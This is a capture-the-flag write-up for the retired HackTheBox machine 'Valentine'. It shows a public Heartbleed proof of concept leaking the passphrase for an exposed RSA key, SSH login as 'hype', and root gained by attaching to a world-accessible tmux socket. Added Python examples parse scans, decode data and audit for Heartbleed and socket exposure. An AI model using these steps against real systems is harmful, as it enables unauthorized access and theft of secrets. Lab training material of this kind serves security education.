
HackTheBox - Valentine - Retired - Update




Recon


I've been using threader3000 lately to do my recon scans. It does a staged scan: the first stage is a very quick up/down scan of all TCP ports, and it then suggests an nmap scan based on the ports that came back open. It also saves all the nmap scans to an XML file, which I like to convert to HTML to make it easier to read.


xsltproc ./valentine.htb/valentine.htb.xml -o ./valentine.html




Looks like we have just three open ports here.


Port Service Version
22 OpenSSH 5.9p1
80 Apache 2.2.22
443 Apache 2.2.22
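The XML that threader3000 hands to xsltproc is just nmap's -oX output, so the port table above can be produced directly from it. The following is an added example, not part of the original post or of threader3000: it parses a constructed nmap XML sample (the 192.0.2.10 address and the filtered port 25 are made up for the demo) and keeps only open ports, prefixing ssl/ where nmap reports a TLS tunnel, as it does for port 443 on this box.

```python
import xml.etree.ElementTree as ET

# Constructed sample of nmap -oX output (not the scan from the post); only the
# elements the parser actually reads are included.
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap">
  <host>
    <address addr="192.0.2.10" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22">
        <state state="open"/>
        <service name="ssh" product="OpenSSH" version="5.9p1"/>
      </port>
      <port protocol="tcp" portid="80">
        <state state="open"/>
        <service name="http" product="Apache httpd" version="2.2.22"/>
      </port>
      <port protocol="tcp" portid="443">
        <state state="open"/>
        <service name="http" product="Apache httpd" version="2.2.22" tunnel="ssl"/>
      </port>
      <port protocol="tcp" portid="25">
        <state state="filtered"/>
        <service name="smtp"/>
      </port>
    </ports>
  </host>
</nmaprun>
"""


def open_ports(xml_text):
    """Return [(port, service, version)] for every port nmap reports as open."""
    root = ET.fromstring(xml_text)
    rows = []
    for host in root.iter("host"):
        for port in host.iter("port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue  # filtered/closed ports are not interesting here
            svc = port.find("service")
            name = svc.get("name", "") if svc is not None else ""
            if svc is not None and svc.get("tunnel") == "ssl":
                name = "ssl/" + name  # nmap marks TLS-wrapped services this way
            product = svc.get("product", "") if svc is not None else ""
            version = svc.get("version", "") if svc is not None else ""
            rows.append((int(port.get("portid")), name, (product + " " + version).strip()))
    return sorted(rows)


def render_table(rows):
    """Render the rows in the same Port/Service/Version layout used in the post."""
    lines = ["Port Service Version"]
    for port, name, ver in rows:
        lines.append(f"{port} {name} {ver}")
    return "\n".join(lines)


if __name__ == "__main__":
    print(render_table(open_ports(SAMPLE_NMAP_XML)))
```

Feed it the real file with open_ports(open("valentine.htb.xml").read()) and you get the same three rows without the XSLT step.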



And nmap thinks it's an Ubuntu box.



Here is what we see on port 80


That logo is familiar… but we will get back to that.


What about port 443?



Same thing but https….


So about that logo….


Not a whole lot of bugs get their own logo, but heartbleed does.


https://heartbleed.com/


CVE-2014-0160


"The Heartbleed bug allows anyone on the Internet to read the memory of the systems protected by the vulnerable versions of the OpenSSL software. This compromises the secret keys used to identify the service providers and to encrypt the traffic, the names and passwords of the users and the actual content. This allows attackers to eavesdrop on communications, steal data directly from the services and users and to impersonate services and users."



Interesting..


OK, let's brute-force the web server for any other folders or files that might be available to us.




Here is some of the output



So we have 3 new things to check out.


/dev/

/encode

/decode



Let's start with /encode.


OK, we have an input box that they will encode for us. It's important here that it says encode, not encrypt… Let's just put an "a" in there and see what happens.



a is encoded as YQ==


I don't know about you, but any time I see an = at the end of an encoded string… I think base64.


In base64 encoding, if the input length is not a multiple of three bytes, equals signs are added to the end as padding.


Let's use our Kali box to check that decoding YQ== as base64 gives us back an a.


echo "YQ==" | base64 -d
a


Yup, so this site just base64 encodes your input… what about /decode?


It does the opposite: it takes your base64 encoded data and turns it back into ASCII for you.
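To make the padding rule concrete, here is an added example (mine, not the site's encoder) that implements base64 by hand: three input bytes become four output characters, and when the last group is short the missing sextets are replaced by = signs. It also checks itself against Python's base64 module, and includes the later password string from this box to show where its trailing == comes from.

```python
import base64

B64_ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"


def padding_count(length: int) -> int:
    """Number of '=' characters base64 appends for an input of this many bytes."""
    return (3 - length % 3) % 3


def b64encode_manual(data: bytes) -> str:
    """Hand-rolled base64: 3 bytes -> 24 bits -> four 6-bit indexes into the alphabet."""
    out = []
    for i in range(0, len(data), 3):
        chunk = data[i:i + 3]
        n = len(chunk)
        # Zero-fill a short final group so we can still split it into sextets.
        bits = int.from_bytes(chunk + b"\x00" * (3 - n), "big")
        sextets = [(bits >> shift) & 0x3F for shift in (18, 12, 6, 0)]
        # 1 byte yields 2 real characters, 2 bytes yield 3, 3 bytes yield 4;
        # the unused positions become '=' padding.
        chars = [B64_ALPHABET[s] for s in sextets[: n + 1]]
        out.append("".join(chars) + "=" * (3 - n))
    return "".join(out)


def matches_stdlib(data: bytes) -> bool:
    """Cross-check the manual encoder against the standard library."""
    return b64encode_manual(data) == base64.b64encode(data).decode()


if __name__ == "__main__":
    for sample in (b"a", b"ab", b"abc", b"heartbleedbelievethehype\n"):
        print(f"{sample!r:32} -> {b64encode_manual(sample)}  padding={padding_count(len(sample))}")
```

The single byte "a" (0x61) becomes the 24-bit value 0x610000, whose first two sextets index Y and Q; the remaining two positions carry no input, hence YQ==.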





OK, what about /dev?


Two files: notes.txt and hype_key.


What is in notes.txt?


To do:

1) Coffee.
2) Research.
3) Fix decoder/encoder before going live.
4) Make sure encoding/decoding is only done client-side.
5) Do not use the decoder/encoder until any of this is done.
6) Find a better way to take notes.


Some notes from the dev on what to fix. OK, what about the hype_key…



Looks like a bunch of hex.


Let's see if we can convert it.



https://www.rapidtables.com/convert/number/hex-to-ascii.html



Looks like, as its name suggests, it is a key… an RSA private key.


I saved this output to my kali box as rsa.key
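Pasting key material into a third-party converter works, but it is just as easy to do locally and you keep the key off someone else's server. This is an added example (not from the post): it strips the whitespace out of a hex dump, decodes it, and then checks that what came out is a complete PEM block and whether it carries the Proc-Type: 4,ENCRYPTED header that OpenSSL's legacy PEM format uses for passphrase-protected keys. The hex dump here is constructed from a short PEM-shaped stand-in, not the real hype_key, and the DEK-Info value is made up.

```python
import re

# Constructed stand-in for the hype_key contents (not the real key): a PEM-shaped
# text with the headers an encrypted legacy OpenSSL private key would carry.
SAMPLE_PEM_TEXT = (
    "-----BEGIN RSA PRIVATE KEY-----\n"
    "Proc-Type: 4,ENCRYPTED\n"
    "DEK-Info: AES-128-CBC,00112233445566778899AABBCCDDEEFF\n"
    "\n"
    "QUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVo=\n"
    "-----END RSA PRIVATE KEY-----\n"
)
# The file on the server looked like this: space-separated hex bytes.
SAMPLE_HEX_DUMP = " ".join(f"{b:02x}" for b in SAMPLE_PEM_TEXT.encode())


def hex_dump_to_text(hex_text: str) -> str:
    """Remove all whitespace/newlines from a hex dump and decode it as ASCII text."""
    cleaned = re.sub(r"\s+", "", hex_text)
    if len(cleaned) % 2:
        raise ValueError("odd number of hex digits; the dump is probably truncated")
    return bytes.fromhex(cleaned).decode("ascii")


def pem_info(text: str) -> dict:
    """Describe the PEM block in text: its label, whether the END line is present,
    and whether the legacy OpenSSL 'Proc-Type: 4,ENCRYPTED' header is set."""
    m = re.search(r"^-----BEGIN ([A-Z ]+)-----$", text, re.M)
    if not m:
        return {"is_pem": False, "label": None, "complete": False, "encrypted": False}
    label = m.group(1)
    return {
        "is_pem": True,
        "label": label,
        "complete": f"-----END {label}-----" in text,
        "encrypted": "Proc-Type: 4,ENCRYPTED" in text,
    }


if __name__ == "__main__":
    pem = hex_dump_to_text(SAMPLE_HEX_DUMP)
    print(pem)
    print(pem_info(pem))
```

Run it on the real file with hex_dump_to_text(open("hype_key").read()) and write the result to rsa.key. An "encrypted": True result tells you up front that SSH will prompt for a passphrase, which is exactly what happens later in this box.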




Exploit


Let's look around for a heartbleed exploit we can leverage.


I found this GitHub repo:


https://github.com/mpgn/heartbleed-PoC


I did a git clone to my Kali box


and ran the exploit against valentine.htb:


python2 ./heartbleed.py valentine.htb


So, backing up a bit…








We never really talked about Heartbleed and what it does. Basically, what you need to know here is that it's a memory leak: servers running a vulnerable version of OpenSSL can have some of the contents of their memory exposed to anyone who connects.



So, after this runs, the PoC saves whatever memory it got back to a file named out.txt.
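The bug itself is a missing bounds check: a TLS heartbeat message carries its own payload length, and vulnerable OpenSSL trusted that field instead of comparing it against the size of the record it actually received. The following is an added example, not code from the post or from the PoC linked above, written from the defender's side: it applies the check that the OpenSSL fix added (type byte + length field + claimed payload + 16 bytes of minimum padding must fit inside the record) to raw TLS records, so it can be used to flag malformed heartbeats in a capture or to sanity-check a server's handling of them. The three records are constructed inline.

```python
import struct

TLS_HEARTBEAT = 24            # TLS record content type for heartbeat (RFC 6520)
HB_REQUEST, HB_RESPONSE = 1, 2
HB_MIN_PADDING = 16           # RFC 6520 requires at least 16 bytes of padding


def inspect_heartbeat(record: bytes) -> str:
    """Classify one TLS record: 'ok', 'oversized_payload', 'not_heartbeat',
    'truncated' or 'bad_type'. 'oversized_payload' is the Heartbleed shape."""
    if len(record) < 5:
        return "truncated"
    ctype, _version, length = struct.unpack("!BHH", record[:5])
    if ctype != TLS_HEARTBEAT:
        return "not_heartbeat"
    fragment = record[5:5 + length]
    if len(fragment) != length or len(fragment) < 3:
        return "truncated"
    hb_type, payload_len = struct.unpack("!BH", fragment[:3])
    if hb_type not in (HB_REQUEST, HB_RESPONSE):
        return "bad_type"
    # The check the OpenSSL patch added: everything the message claims to contain
    # must fit inside the record that actually arrived.
    if 1 + 2 + payload_len + HB_MIN_PADDING > length:
        return "oversized_payload"
    return "ok"


# Constructed records (TLS 1.1 version bytes 0x0302). Each fragment is
# type(1) + payload_length(2) + payload + 16 padding bytes = 23 bytes.
GOOD_RECORD = b"\x18\x03\x02\x00\x17" + b"\x01\x00\x04" + b"ping" + b"\x00" * 16
# Same 23-byte record, but the length field claims 0x4000 bytes of payload.
BAD_RECORD = b"\x18\x03\x02\x00\x17" + b"\x01\x40\x00" + b"ping" + b"\x00" * 16
# A handshake record (content type 0x16) is ignored by the check.
HANDSHAKE_RECORD = b"\x16\x03\x02\x00\x05" + b"\x01\x00\x00\x01\x00"


def classify_all(records):
    """Run the check over a list of records, e.g. those pulled from a pcap."""
    return [inspect_heartbeat(r) for r in records]


if __name__ == "__main__":
    for name, rec in (("good", GOOD_RECORD), ("bad", BAD_RECORD), ("handshake", HANDSHAKE_RECORD)):
        print(f"{name:10} -> {inspect_heartbeat(rec)}")
```

A patched server answers an oversized request with nothing at all (the fix simply drops it), so the same logic doubles as a way to tell a patched host from a vulnerable one without reading any leaked memory: count how many bytes come back relative to what the request claimed.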


python2 ./heartbleed.py valentine.htb


Let's check out our out.txt file and see what we might have gotten out of memory.


Looks like someone is trying to use decode.php to decode a base64 string…


Let's help them out with that. :)


echo "aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==" | base64 -d
heartbleedbelievethehype


heartbleedbelievethehype


I wonder if we can use that with the RSA key we found earlier to SSH to the box… The only real issue is that we still don't know what the username might be…


Could be root, valentine, hype, heart, heartbleed or anything else.



I tried valentine first


You need to make rsa.key less permissive or SSH will complain about it.


chmod 700 ./rsa.key




Good news… it looks like heartbleedbelievethehype is the passphrase for the key, but unfortunately that doesn't get us in as valentine.


Let's try other usernames





We finally hit pay dirt with hype (the name of the key on the server).





And we can get the user flag from hype's home folder.



Looking in the user's home folder, we can see that .bash_history is not empty, unlike on most HackTheBox machines.


So let's take a look:



hype@Valentine:~$ cat .bash_history

exit
exot
exit
ls -la
cd /
ls -la
cd .devs
ls -la
tmux -L dev_sess
tmux a -t dev_sess
tmux --help
tmux -S /.devs/dev_sess
exit
whoami
exit


OK, it looks like there are some tmux commands here that the user needed help remembering how to use; the --help is telling, I think. Let's try executing the command the user ran right after looking at the help:


tmux -S /.devs/dev_sess 


We get dropped into a tmux session as root.
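The root cause here is a root-owned tmux server socket that a lower-privileged user can connect to; whoever can open the socket gets the server's shell. tmux normally keeps its sockets under a per-user directory with mode 700, so a socket parked somewhere like /.devs is exactly what an audit should catch. The following is an added example (not from the post) of that audit: it walks a directory tree for unix sockets owned by a privileged uid that are group- or world-writable (connecting to a unix socket requires write permission on it). The demo builds two sockets in a temporary directory and, because the demo cannot create root-owned files, treats the current user as the privileged one; on a real host you would run it as root over / with the default privileged_uids.

```python
import os
import shutil
import socket
import stat
import tempfile


def exposed_sockets(root_dir, privileged_uids=frozenset({0})):
    """Return (path, mode, uid) for every unix socket under root_dir that is owned
    by one of privileged_uids and writable by group or others."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root_dir):
        for name in filenames:          # os.walk lists non-directory entries (sockets included) here
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue                # vanished or unreadable; skip rather than abort the audit
            if not stat.S_ISSOCK(st.st_mode):
                continue
            if st.st_uid not in privileged_uids:
                continue
            if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
                findings.append((path, oct(stat.S_IMODE(st.st_mode)), st.st_uid))
    return findings


def demo():
    """Create one open and one private socket in a temp dir and audit them.
    Returns the basenames that were flagged (constructed demo, not a real host)."""
    workdir = tempfile.mkdtemp(prefix="tmux_audit_")
    socks = []
    try:
        for name, mode in (("open.sock", 0o777), ("private.sock", 0o600)):
            path = os.path.join(workdir, name)
            s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
            s.bind(path)                # creates the socket file on disk
            os.chmod(path, mode)
            socks.append(s)
        # The demo runs unprivileged, so treat our own uid as the "root" we audit for.
        found = exposed_sockets(workdir, privileged_uids={os.getuid()})
        return [os.path.basename(p) for p, _mode, _uid in found]
    finally:
        for s in socks:
            s.close()
        shutil.rmtree(workdir, ignore_errors=True)


if __name__ == "__main__":
    print("flagged:", demo())
    print("system findings:", exposed_sockets("/tmp"))
```

The fix on a box like this is the same as what the audit enforces: keep the tmux socket (and its parent directory) at 700 and owned by the user running the server, and don't leave detached root sessions lying around for other accounts to attach to.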






And it's pretty easy to grab our root flag from here.





